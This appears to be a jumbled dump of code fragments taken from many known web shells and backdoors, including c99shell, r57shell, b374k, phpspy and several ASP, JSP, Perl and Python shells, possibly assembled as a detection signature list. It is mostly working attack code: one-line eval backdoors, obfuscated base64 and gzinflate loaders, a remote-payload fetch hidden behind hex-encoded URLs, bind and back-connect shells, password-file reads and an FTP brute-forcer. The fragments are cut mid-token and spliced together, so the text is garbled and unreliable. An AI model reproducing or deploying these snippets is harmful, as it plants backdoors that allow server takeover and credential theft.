value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? \"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? \"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! (maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . \"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? $cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . $directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. - sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 